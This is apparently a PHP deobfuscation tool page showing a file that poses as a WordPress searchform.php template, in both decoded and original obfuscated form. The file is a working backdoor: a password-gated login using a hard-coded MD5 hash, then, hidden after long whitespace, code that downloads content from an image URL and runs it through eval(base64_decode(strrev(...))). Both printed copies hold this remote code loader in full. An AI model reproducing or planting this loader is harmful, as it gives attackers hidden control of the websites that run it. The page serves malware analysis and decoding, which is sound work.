Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php goto NLnKLsvYFH; NLnKLsvYFH: $pas = "\x37\60\x63\62\x62\71\x39\67\x36\143\x36\144\..

Decoded Output download

<?php 
 goto NLnKLsvYFH; NLnKLsvYFH: $pas = "70c2b9976c6d53760e3c3de79f728f3d"; error_reporting(0); set_time_limit(0); session_start(); if (isset($_SESSION["loggedokm"])) { goto DqqOhzX5B0; } goto u3NT7x2QrJ; u3NT7x2QrJ: $_SESSION["loggedokm"] = false; DqqOhzX5B0: if (!isset($_POST["password"])) { goto pb73Ufbn0o; } if (!(md5($_POST["password"]) == $pas)) { goto mr5E2rLws5; } $_SESSION["loggedokm"] = md5($_POST["password"]); goto SjaSVtI46I; SjaSVtI46I: mr5E2rLws5: pb73Ufbn0o: if (!(!$_SESSION["loggedokm"] || $_SESSION["loggedokm"] != $pas)) { goto EXNN3Tp2rS; } echo "\xd\xa<html><head><title> </title></head>\xd
  <body>\xd\xa    <p align="center"><center><font style="font-size:13px" color="#fde6cd" face="">
    <form method="post">
\xa      <input type="password" name="password">\xd
      <input type="submit" name="submit" value="  >>">
\xa    </form>
  </body>\xd
</html>
\xa
\xa"; exit; goto ocC9gxzse4; ocC9gxzse4: EXNN3Tp2rS: ?><?php 
 
 
/*  
 * The searchform.php template. 
 * 
 * Used any time that get_search_form() is called. 
 * 
 * @link https://wordpress.org/themes/template/ 
 * @package WordPress 
 * @subpackage  
 * @since 1.0 */ 
  
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
$l = "https://user-images.githubusercontent.com/105673502/236584953-2a52fb35-6cd9-437b-8af5-44b8842f540f.jpg"/* "" - ni*/; 
 
 
//DX for each form and a string 
 
 
		 
		if( function_exists('curl_init') ) { 
			$ch = curl_init(); 
			curl_setopt($ch, CURLOPT_URL, $l); 
			curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 
			curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); 
			curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); 
			curl_setopt($ch, CURLOPT_HEADER, FALSE); 
			curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36"); 
			$body = curl_exec($ch); 
			curl_close($ch); 
		} 
		else { 
			$body = @file_get_contents($l);			 
		} 
	 eval(base64_decode(strrev($body)));		 
 
		 
 
 
 
 
?>

Did this file decode correctly?

Original Code

<?php
 goto NLnKLsvYFH; NLnKLsvYFH: $pas = "\x37\60\x63\62\x62\71\x39\67\x36\143\x36\144\x35\63\x37\66\x30\145\x33\143\x33\144\x65\67\x39\146\x37\62\x38\146\x33\144"; error_reporting(0); set_time_limit(0); session_start(); if (isset($_SESSION["\x6c\x6f\x67\x67\145\144\157\x6b\x6d"])) { goto DqqOhzX5B0; } goto u3NT7x2QrJ; u3NT7x2QrJ: $_SESSION["\x6c\x6f\147\x67\x65\144\157\153\x6d"] = false; DqqOhzX5B0: if (!isset($_POST["\160\x61\x73\163\x77\x6f\x72\x64"])) { goto pb73Ufbn0o; } if (!(md5($_POST["\160\x61\x73\163\x77\157\x72\144"]) == $pas)) { goto mr5E2rLws5; } $_SESSION["\x6c\x6f\x67\x67\145\x64\x6f\153\155"] = md5($_POST["\160\141\x73\163\x77\x6f\x72\x64"]); goto SjaSVtI46I; SjaSVtI46I: mr5E2rLws5: pb73Ufbn0o: if (!(!$_SESSION["\154\157\x67\x67\145\x64\157\x6b\155"] || $_SESSION["\x6c\x6f\x67\147\x65\x64\x6f\x6b\155"] != $pas)) { goto EXNN3Tp2rS; } echo "\xd\xa\74\x68\164\x6d\154\76\74\150\145\x61\x64\76\74\x74\x69\164\154\145\x3e\40\74\x2f\164\x69\x74\x6c\x65\76\x3c\57\150\145\x61\144\x3e\xd\12\40\40\x3c\x62\x6f\144\x79\76\xd\xa\x20\x20\x20\x20\x3c\x70\40\x61\x6c\x69\x67\156\x3d\x22\143\x65\x6e\x74\x65\x72\42\x3e\74\143\145\x6e\164\145\162\x3e\74\x66\157\x6e\164\40\163\x74\171\x6c\145\x3d\x22\x66\x6f\156\164\x2d\x73\151\x7a\x65\72\x31\63\x70\170\x22\40\143\157\154\x6f\162\75\x22\43\x66\x64\145\x36\x63\144\42\x20\x66\x61\143\145\75\x22\x22\x3e\15\12\x20\40\40\x20\74\146\x6f\x72\x6d\x20\155\x65\x74\x68\x6f\x64\75\x22\x70\x6f\x73\x74\42\76\15\xa\40\40\x20\x20\x20\x20\74\151\x6e\x70\x75\x74\x20\164\x79\x70\x65\x3d\42\x70\x61\x73\x73\167\157\x72\144\42\x20\156\x61\155\x65\75\42\x70\x61\x73\x73\x77\x6f\162\144\42\76\xd\12\40\x20\40\x20\x20\x20\x3c\151\156\160\165\164\x20\x74\171\x70\145\x3d\42\163\x75\142\x6d\x69\x74\x22\40\156\141\155\145\75\42\163\165\x62\x6d\x69\164\42\40\x76\141\x6c\165\145\x3d\x22\x20\x20\x3e\76\x22\x3e\15\xa\x20\x20\40\40\74\57\x66\x6f\162\155\76\15\12\x20\x20\74\57\x62\x6f\x64\171\76\xd\12\74\x2f\x68\164\x6d\x6c\x3e\15\xa\15\xa"; exit; goto ocC9gxzse4; ocC9gxzse4: EXNN3Tp2rS: ?><?php


/* 
 * The searchform.php template.
 *
 * Used any time that get_search_form() is called.
 *
 * @link https://wordpress.org/themes/template/
 * @package WordPress
 * @subpackage 
 * @since 1.0 */
 











































$l = "https://user-images.githubusercontent.com/105673502/236584953-2a52fb35-6cd9-437b-8af5-44b8842f540f.jpg"/* "" - ni*/;


//DX for each form and a string


		
		if( function_exists('curl_init') ) {
			$ch = curl_init();
			curl_setopt($ch, CURLOPT_URL, $l);
			curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
			curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
			curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
			curl_setopt($ch, CURLOPT_HEADER, FALSE);
			curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36");
			$body = curl_exec($ch);
			curl_close($ch);
		}
		else {
			$body = @file_get_contents($l);			
		}
	 eval(base64_decode(strrev($body)));		

		




?>

Function Calls

None

Variables

None

Stats

MD5 f70d8b7c5230fbac2cc757a0525794d1
Eval Count 0
Decode Time 43 ms